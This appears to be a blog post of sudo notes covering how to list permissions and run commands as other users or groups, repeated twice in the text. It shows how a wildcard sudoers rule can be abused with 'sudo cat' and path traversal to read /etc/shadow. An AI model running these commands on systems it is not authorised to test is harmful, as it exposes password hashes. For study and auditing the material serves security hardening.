What access do I have?
$ sudo -l
What access do other users have?
$ sudo -U username -l
Run a Command as Another User
Use the -u flag
$ sudo -u [username] [command]
Enter your password, not the root password
Run a Command as Another Group
Use the -g flag
$ sudo -g operator dump
$ sudo -g #5 dump
Rules processed in order; Last matching rule wins
Dangers of Wildcards (Check by sudo -l or access to sudoers file)
Pete ALL=/bin/cat /var/log/messages*
So you can view all the /var/log/messages archives...
$ sudo cat /var/log/messages /etc/shadow or
$ sudo cat /var/log/messages/../../../etc/shadow
...and all the other files in the system
And many More...
References:
http://repository.root-me.org/Administration/Unix/EN%20-%20sudo%20:%20you're%20doing%20it%20wrong.pdf
$ sudo -l
What access do other users have?
$ sudo -U username -l
Run a Command as Another User
Use the -u flag
$ sudo -u [username] [command]
Enter your password, not the root password
Run a Command as Another Group
Use the -g flag
$ sudo -g operator dump
$ sudo -g #5 dump
Rules processed in order; Last matching rule wins
Dangers of Wildcards (Check by sudo -l or access to sudoers file)
Pete ALL=/bin/cat /var/log/messages*
So you can view all the /var/log/messages archives...
$ sudo cat /var/log/messages /etc/shadow or
$ sudo cat /var/log/messages/../../../etc/shadow
...and all the other files in the system
And many More...
References:
http://repository.root-me.org/Administration/Unix/EN%20-%20sudo%20:%20you're%20doing%20it%20wrong.pdf
No comments:
Post a Comment